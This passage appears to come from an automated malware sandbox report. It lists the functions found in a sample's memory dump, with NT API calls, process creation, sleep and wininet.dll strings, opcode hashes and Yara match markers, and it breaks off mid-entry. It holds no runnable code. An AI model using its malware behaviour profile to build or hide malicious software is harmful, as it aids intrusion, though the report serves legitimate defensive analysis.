                                                                          • Opcode ID: 4c02b6f0bb5bade2214ddf3c9f70d4286b79a54b0409041d94b5f4a1e746d8d6
                                                                          • Instruction ID: 74d988b9056bde69663f38f73d2cbbc59b54cbb6980f8ffb9bbcad3b877d981e
                                                                          • Opcode Fuzzy Hash: 4c02b6f0bb5bade2214ddf3c9f70d4286b79a54b0409041d94b5f4a1e746d8d6
                                                                          • Instruction Fuzzy Hash: 52F0B2B6200108ABCB48DF88DC95EEB77ADAF8C754F158248FA0D97341D630E8118BA0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00988260, Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • NtReadFile.NTDLL(00983D42,5E972F59,FFFFFFFF,00983A01,?,?,00983D42,?,00983A01,FFFFFFFF,5E972F59,00983D42,?,00000000), ref: 009882A5
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.910849108.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: false
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: FileRead
                                                                          • String ID:
                                                                          • API String ID: 2738559852-0
                                                                          • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                          • Instruction ID: 309fff98af1cb4757f8a74279c42f14dfc063466f219b366ad0602c648c3020f
                                                                          • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                          • Instruction Fuzzy Hash: 8BF0A9B2200108ABCB14DF89DC81EEB77ADAF8C754F158248BA1D97241DA30E8118BA0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00988262, Relevance: 1.5, APIs: 1, Instructions: 35filenativeCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • NtReadFile.NTDLL(00983D42,5E972F59,FFFFFFFF,00983A01,?,?,00983D42,?,00983A01,FFFFFFFF,5E972F59,00983D42,?,00000000), ref: 009882A5
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.910849108.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: false
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: FileRead
                                                                          • String ID:
                                                                          • API String ID: 2738559852-0
                                                                          • Opcode ID: 5ff7f6d241f80774983b5d47d11df18d265765a86ed24d94cb357b65c5fea9f2
                                                                          • Instruction ID: fd25f00dcda6ce945c5dae6365ede96940aa0f53f6739a6e70f577fbb5d8694b
                                                                          • Opcode Fuzzy Hash: 5ff7f6d241f80774983b5d47d11df18d265765a86ed24d94cb357b65c5fea9f2
                                                                          • Instruction Fuzzy Hash: F1F0B7B2200108AFCB14DF99DC80EEB77ADEF8C354F158248BA1DE7241DA30E811CBA0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00988390, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00972D11,00002000,00003000,00000004), ref: 009883C9
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.910849108.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: false
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: AllocateMemoryVirtual
                                                                          • String ID:
                                                                          • API String ID: 2167126740-0
                                                                          • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                                          • Instruction ID: 8e7e01f37dba8c31139ee21632c0aed4f81845f7ca7202c0e25b940ac7ffacd7
                                                                          • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                                          • Instruction Fuzzy Hash: 70F01CB1200208ABCB14DF89CC81EE777ADAF88750F118148BE0897341C630F810CBF0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 009882E0, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • NtClose.NTDLL(00983D20,?,?,00983D20,00000000,FFFFFFFF), ref: 00988305
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.910849108.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: false
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Close
                                                                          • String ID:
                                                                          • API String ID: 3535843008-0
                                                                          • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                                          • Instruction ID: eff4bc131c6feb7fe8c8e1791cf092b4278718960ad9f359569e5f82f0362a96
                                                                          • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                                          • Instruction Fuzzy Hash: C0D012752002146BD710EF98CC45FD7775CEF44750F154455BA185B382C930F90087E0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 009882DA, Relevance: 1.5, APIs: 1, Instructions: 17nativeCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • NtClose.NTDLL(00983D20,?,?,00983D20,00000000,FFFFFFFF), ref: 00988305
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.910849108.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: false
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Close
                                                                          • String ID:
                                                                          • API String ID: 3535843008-0
                                                                          • Opcode ID: 94b6a14007ea7deeb6e181a319077c28107f1878e46c1b36a75a15e03bf436bc
                                                                          • Instruction ID: b1f799ef0e3a2e340cefeca4e3ee6b6b2e783ec68712b93cc389e0b35c074575
                                                                          • Opcode Fuzzy Hash: 94b6a14007ea7deeb6e181a319077c28107f1878e46c1b36a75a15e03bf436bc
                                                                          • Instruction Fuzzy Hash: EDD0C2A90092C04FCB11EEB4A5C14867B40EE902183245A8ED8A40B647C5789205A391
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 05079910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.914054989.0000000005010000.00000040.00000001.sdmp, Offset: 05010000, based on PE: true
                                                                          • Associated: 0000000B.00000002.914528335.000000000512B000.00000040.00000001.sdmp Download File
                                                                          • Associated: 0000000B.00000002.914570132.000000000512F000.00000040.00000001.sdmp Download File
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: 4982e1ed11540e9a269f693368cf7ef77e15df29b679edec914c05939869f322
                                                                          • Instruction ID: 702307b2e1cb5b7298a6dde9b47cf5e80ef6cde2636c830ada9fd53c0d803f82
                                                                          • Opcode Fuzzy Hash: 4982e1ed11540e9a269f693368cf7ef77e15df29b679edec914c05939869f322
                                                                          • Instruction Fuzzy Hash: 3A9002B220100502D1407159D444F5A011597D0341F91C111E5454558E86998DD576A5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 05079540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.914054989.0000000005010000.00000040.00000001.sdmp, Offset: 05010000, based on PE: true
                                                                          • Associated: 0000000B.00000002.914528335.000000000512B000.00000040.00000001.sdmp Download File
                                                                          • Associated: 0000000B.00000002.914570132.000000000512F000.00000040.00000001.sdmp Download File
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: fb4a2aae409065d89aae922a5ccb2421b3a7d72738e3315e62633b06d14d471e
                                                                          • Instruction ID: 1a980de5a0d6beb598f1a3b87eccca4ad163cba5f952fd81679449851b1acdc8
                                                                          • Opcode Fuzzy Hash: fb4a2aae409065d89aae922a5ccb2421b3a7d72738e3315e62633b06d14d471e
                                                                          • Instruction Fuzzy Hash: 90900266211001030105B5599744D1B015697D5391391C121F1405554CD66188616161
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 050799A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.914054989.0000000005010000.00000040.00000001.sdmp, Offset: 05010000, based on PE: true
                                                                          • Associated: 0000000B.00000002.914528335.000000000512B000.00000040.00000001.sdmp Download File
                                                                          • Associated: 0000000B.00000002.914570132.000000000512F000.00000040.00000001.sdmp Download File
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: 32282c26d883ac62b8a2bd091933314af80ec573076669dbe14afffeef10d555
                                                                          • Instruction ID: b64ea523f72be1122c59f725f117a6ac4c0e7b57fe8a4eb5a0cca6f9afeef542
                                                                          • Opcode Fuzzy Hash: 32282c26d883ac62b8a2bd091933314af80ec573076669dbe14afffeef10d555
                                                                          • Instruction Fuzzy Hash: 279002A234100542D1007159D454F1A0115D7E1341F91C115E1454558D8659CC527166
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 050795D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.914054989.0000000005010000.00000040.00000001.sdmp, Offset: 05010000, based on PE: true
                                                                          • Associated: 0000000B.00000002.914528335.000000000512B000.00000040.00000001.sdmp Download File
                                                                          • Associated: 0000000B.00000002.914570132.000000000512F000.00000040.00000001.sdmp Download File
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: 9e53baa6f185e56dbfb4daed15b82925f5e3770f992f8cb5bafbdb008115f3f2
                                                                          • Instruction ID: 5ed72e2165ac0e95d46ea2b416e3a30a743ed5e9a1ee5ba8319301ea1b3d28bc
                                                                          • Opcode Fuzzy Hash: 9e53baa6f185e56dbfb4daed15b82925f5e3770f992f8cb5bafbdb008115f3f2
                                                                          • Instruction Fuzzy Hash: 519002A22020010341057159D454E2A411A97E0241B91C121E1404594DC56588917165
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 05079840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.914054989.0000000005010000.00000040.00000001.sdmp, Offset: 05010000, based on PE: true
                                                                          • Associated: 0000000B.00000002.914528335.000000000512B000.00000040.00000001.sdmp Download File
                                                                          • Associated: 0000000B.00000002.914570132.000000000512F000.00000040.00000001.sdmp Download File
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: dc9e769ec6d011d9bc773a642824627930075742f31f558d430a866ddf4515ab
                                                                          • Instruction ID: 4b112ef1196d76582003eb51d688f9f942cfd0eaef07d4a3eab4521612e855a0
                                                                          • Opcode Fuzzy Hash: dc9e769ec6d011d9bc773a642824627930075742f31f558d430a866ddf4515ab
                                                                          • Instruction Fuzzy Hash: 28900262242042525545B159D444D1B4116A7E02817D1C112E1804954C85669856E661
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 05079860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.914054989.0000000005010000.00000040.00000001.sdmp, Offset: 05010000, based on PE: true
                                                                          • Associated: 0000000B.00000002.914528335.000000000512B000.00000040.00000001.sdmp Download File
                                                                          • Associated: 0000000B.00000002.914570132.000000000512F000.00000040.00000001.sdmp Download File
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: f89cba752821c4953a439ba0054e35568f32871de639543e5e0b56cb18387109
                                                                          • Instruction ID: ce163443457488a29650bfcc89a0b5f012f71cc9184125296f35136d761c74d0
                                                                          • Opcode Fuzzy Hash: f89cba752821c4953a439ba0054e35568f32871de639543e5e0b56cb18387109
                                                                          • Instruction Fuzzy Hash: 7D90027220100513D1117159D544F1B011997D0281FD1C512E081455CD96968952B161
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 05079710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.914054989.0000000005010000.00000040.00000001.sdmp, Offset: 05010000, based on PE: true
                                                                          • Associated: 0000000B.00000002.914528335.000000000512B000.00000040.00000001.sdmp Download File
                                                                          • Associated: 0000000B.00000002.914570132.000000000512F000.00000040.00000001.sdmp Download File
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: 95b41c0792f84d04d2ffe264e3522e6757b4aa0bed3558266366bfe5551faba5
                                                                          • Instruction ID: 3cd7729d7e7922c9428bae1b804b4dcdade5d22b79c53adfe9ed5303542e81d8
                                                                          • Opcode Fuzzy Hash: 95b41c0792f84d04d2ffe264e3522e6757b4aa0bed3558266366bfe5551faba5
                                                                          • Instruction Fuzzy Hash: E890027220100502D1007599E448E5A011597E0341F91D111E5414559EC6A588917171
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 05079780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.914054989.0000000005010000.00000040.00000001.sdmp, Offset: 05010000, based on PE: true
                                                                          • Associated: 0000000B.00000002.914528335.000000000512B000.00000040.00000001.sdmp Download File
                                                                          • Associated: 0000000B.00000002.914570132.000000000512F000.00000040.00000001.sdmp Download File
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: fe62229a25578e83eb94c17b0954c8961a612c9918fe0d1efe95e68c1553cba5
                                                                          • Instruction ID: 50e2b2be6ce849950acb38268a85c214034df0be96df0bd906118c39455e1abd
                                                                          • Opcode Fuzzy Hash: fe62229a25578e83eb94c17b0954c8961a612c9918fe0d1efe95e68c1553cba5
                                                                          • Instruction Fuzzy Hash: ED90026A21300102D1807159E448E1E011597D1242FD1D515E040555CCC95588696361
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 05079FE0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.914054989.0000000005010000.00000040.00000001.sdmp, Offset: 05010000, based on PE: true
                                                                          • Associated: 0000000B.00000002.914528335.000000000512B000.00000040.00000001.sdmp Download File
                                                                          • Associated: 0000000B.00000002.914570132.000000000512F000.00000040.00000001.sdmp Download File
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: a2860ed409d5db0017eb4d429f8b1475fe289cfb2c6cfbbb30154d3339cfefc1
                                                                          • Instruction ID: 538d6e9e8d355bd975f514d256fcf18ff5103909fb59bfd9a649c803fabb81c6
                                                                          • Opcode Fuzzy Hash: a2860ed409d5db0017eb4d429f8b1475fe289cfb2c6cfbbb30154d3339cfefc1
                                                                          • Instruction Fuzzy Hash: B590027231114502D1107159D444F1A011597D1241F91C511E0C1455CD86D588917162
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 05079A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.914054989.0000000005010000.00000040.00000001.sdmp, Offset: 05010000, based on PE: true
                                                                          • Associated: 0000000B.00000002.914528335.000000000512B000.00000040.00000001.sdmp Download File
                                                                          • Associated: 0000000B.00000002.914570132.000000000512F000.00000040.00000001.sdmp Download File
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: 8770051f5228608b746dfc61de2132b6a7b8b644322691dfda981f864f78c460
                                                                          • Instruction ID: a9f38bf34a3902ab51bdb4fc907fcef415f52985f959fa21af609d5adcac5355
                                                                          • Opcode Fuzzy Hash: 8770051f5228608b746dfc61de2132b6a7b8b644322691dfda981f864f78c460
                                                                          • Instruction Fuzzy Hash: 7E90026221180142D2007569DC54F1B011597D0343F91C215E0544558CC95588616561
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 05079650, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.914054989.0000000005010000.00000040.00000001.sdmp, Offset: 05010000, based on PE: true
                                                                          • Associated: 0000000B.00000002.914528335.000000000512B000.00000040.00000001.sdmp Download File
                                                                          • Associated: 0000000B.00000002.914570132.000000000512F000.00000040.00000001.sdmp Download File
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: 2c8edb4efaa32b112a8bd47a8837045e6c68e20151890569a5c6af2d6fe6187a
                                                                          • Instruction ID: 75d50783aeeb8412a5ab4b32d8640e31a53f58eb96d35e161fd9e08a2510194d
                                                                          • Opcode Fuzzy Hash: 2c8edb4efaa32b112a8bd47a8837045e6c68e20151890569a5c6af2d6fe6187a
                                                                          • Instruction Fuzzy Hash: 1F90027220504942D1407159D444E5A012597D0345F91C111E0454698D96658D55B6A1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 05079660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.914054989.0000000005010000.00000040.00000001.sdmp, Offset: 05010000, based on PE: true
                                                                          • Associated: 0000000B.00000002.914528335.000000000512B000.00000040.00000001.sdmp Download File
                                                                          • Associated: 0000000B.00000002.914570132.000000000512F000.00000040.00000001.sdmp Download File
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: 777810df15e2f3f2f8aaa33eb1b835667b0da291096110439d688285ac6dee12
                                                                          • Instruction ID: aef9c33c30363cbaf42f5cb19163ab1729b04515235f3fb92f3e46e35a302c76
                                                                          • Opcode Fuzzy Hash: 777810df15e2f3f2f8aaa33eb1b835667b0da291096110439d688285ac6dee12
                                                                          • Instruction Fuzzy Hash: C890027220100902D1807159D444E5E011597D1341FD1C115E0415658DCA558A5977E1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 050796D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.914054989.0000000005010000.00000040.00000001.sdmp, Offset: 05010000, based on PE: true
                                                                          • Associated: 0000000B.00000002.914528335.000000000512B000.00000040.00000001.sdmp Download File
                                                                          • Associated: 0000000B.00000002.914570132.000000000512F000.00000040.00000001.sdmp Download File
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: 7925633a7397850e7a317bfa25a3335b3382d06f7e488a290871688d5799c0fd
                                                                          • Instruction ID: 6a3a2ee17942eefe1008bb2d0b503321f04bd05822c2b2e3caa8bf6286a98294
                                                                          • Opcode Fuzzy Hash: 7925633a7397850e7a317bfa25a3335b3382d06f7e488a290871688d5799c0fd
                                                                          • Instruction Fuzzy Hash: 1190027220100942D1007159D444F5A011597E0341F91C116E0514658D8655C8517561
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 050796E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.914054989.0000000005010000.00000040.00000001.sdmp, Offset: 05010000, based on PE: true
                                                                          • Associated: 0000000B.00000002.914528335.000000000512B000.00000040.00000001.sdmp Download File
                                                                          • Associated: 0000000B.00000002.914570132.000000000512F000.00000040.00000001.sdmp Download File
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: f204b2c1e64df300bbb25ef5176a20d4b8f38f86e2282c6b1b61776e14a23eeb
                                                                          • Instruction ID: 7e16494d0aff7fc3b6dab2e55c7d6a5e76b0de179dddffa309430b274bae6731
                                                                          • Opcode Fuzzy Hash: f204b2c1e64df300bbb25ef5176a20d4b8f38f86e2282c6b1b61776e14a23eeb
                                                                          • Instruction Fuzzy Hash: 7190027220108902D1107159D444F5E011597D0341F95C511E481465CD86D588917161
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00986ED0, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90sleepCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • Sleep.KERNELBASE(000007D0), ref: 00986F78
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.910849108.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: false
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Sleep
                                                                          • String ID: net.dll$wininet.dll
                                                                          • API String ID: 3472027048-1269752229
                                                                          • Opcode ID: 76c8361c82350be45f88ad358b8fdb9bec2c6d9c73423c82a57cea3f8d9feaf4
                                                                          • Instruction ID: 9f0210f6a7f7a1e2cf55c55d2e3a787cf4e4826bd16fb9858017e548d4066650
                                                                          • Opcode Fuzzy Hash: 76c8361c82350be45f88ad358b8fdb9bec2c6d9c73423c82a57cea3f8d9feaf4
                                                                          • Instruction Fuzzy Hash: 26318DB1601704ABC711EFA8D8A1FA7B7B8AF88700F04841DF65A9B341D730F945CBA1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00986ECC, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 80sleepCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • Sleep.KERNELBASE(000007D0), ref: 00986F78
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.910849108.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: false
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Sleep
                                                                          • String ID: net.dll$wininet.dll
                                                                          • API String ID: 3472027048-1269752229
                                                                          • Opcode ID: f6d0d06115d90521ca26746db08341e6b9926ea1911430217e6f13b6a767b4ca
                                                                          • Instruction ID: 4afafe18dd1cfbbafe991447e06e68b9ffa0e9d3e83c4cec1daa9a7c31d8b8dc
                                                                          • Opcode Fuzzy Hash: f6d0d06115d90521ca26746db08341e6b9926ea1911430217e6f13b6a767b4ca
                                                                          • Instruction Fuzzy Hash: 31217EB1641304ABD710EFA4D8A1FAABBB8AF88704F148419F61A5B341D374F945CBA1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 009884B3, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 26memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00973B93), ref: 009884ED
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.910849108.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: false
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: FreeHeap
                                                                          • String ID: .z`
                                                                          • API String ID: 3298025750-1441809116
                                                                          • Opcode ID: 68348dcd3da75332e009829c7e4d66b06f717474ac3c96b7868e3bc13a832319
                                                                          • Instruction ID: 268dda4a78e3ec178707c9197b05c35aea351d4002f54b6fa2b66feec20ecdb4
                                                                          • Opcode Fuzzy Hash: 68348dcd3da75332e009829c7e4d66b06f717474ac3c96b7868e3bc13a832319
                                                                          • Instruction Fuzzy Hash: DAE039B1200604ABD714DF58CC99E9737A8AF88350F058554F9195B392D630E9188BB1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 009884C0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00973B93), ref: 009884ED
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.910849108.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: false
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: FreeHeap
                                                                          • String ID: .z`
                                                                          • API String ID: 3298025750-1441809116
                                                                          • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                                          • Instruction ID: 66ae2b745666deac2befce05f65f271f328244318af84d7694df4fd58a0ed1d9
                                                                          • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                                          • Instruction Fuzzy Hash: 3FE01AB12002046BDB14EF59CC45EA777ACAF88750F014554BA085B381CA30E9108AF0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00988447, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 21memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00973B93), ref: 009884ED
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.910849108.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: false
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: FreeHeap
                                                                          • String ID: .z`
                                                                          • API String ID: 3298025750-1441809116
                                                                          • Opcode ID: 77c7bd82aad5880222f33c7206831058cc87f1e1a479438462f2c06e48de24ce
                                                                          • Instruction ID: 33d2644f788ed4aae52385afe12b78915b067fb72811fc5a8c72e4632a00cfe9
                                                                          • Opcode Fuzzy Hash: 77c7bd82aad5880222f33c7206831058cc87f1e1a479438462f2c06e48de24ce
                                                                          • Instruction Fuzzy Hash: FFE0C2FA1082816BCB10EF34D8809DBBBA9AF91314324454DE8A847783CA31D91ACBB0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00977260, Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 009772BA
                                                                          • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 009772DB
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.910849108.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: false
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: MessagePostThread
                                                                          • String ID:
                                                                          • API String ID: 1836367815-0
                                                                          • Opcode ID: ff0b76be365e3e0789604f06e9fb755775fd01b8c77a2ac04d00f4312ace3b7f
                                                                          • Instruction ID: 376efaca6a3f11c32557443ae1db19a615a482db7b405ef1f9f2b3be10ed20b1
                                                                          • Opcode Fuzzy Hash: ff0b76be365e3e0789604f06e9fb755775fd01b8c77a2ac04d00f4312ace3b7f
                                                                          • Instruction Fuzzy Hash: 58018B32A8032877E721B6949C43FFE776CAB40F51F154115FF08BA1C2E694690647F5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0098852D, Relevance: 1.5, APIs: 1, Instructions: 43processCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 00988584
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.910849108.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: false
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CreateInternalProcess
                                                                          • String ID:
                                                                          • API String ID: 2186235152-0
                                                                          • Opcode ID: b7ba6b1f2f4de5ac464e711c59b6cc3913110cdb1179063aeae28d7df8c44575
                                                                          • Instruction ID: d066d08ccf3cda853fa5d22154a58e2962529b4cbdea1c4f9e8d43f4c9997e3b
                                                                          • Opcode Fuzzy Hash: b7ba6b1f2f4de5ac464e711c59b6cc3913110cdb1179063aeae28d7df8c44575
                                                                          • Instruction Fuzzy Hash: 1601AFB6210108ABCB54DF99DC81EEB77ADAF8C754F158258FA0DA7241DA30EC51CBA0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00988530, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON
                                                                          Download Yara Rule
                                                                          APIs
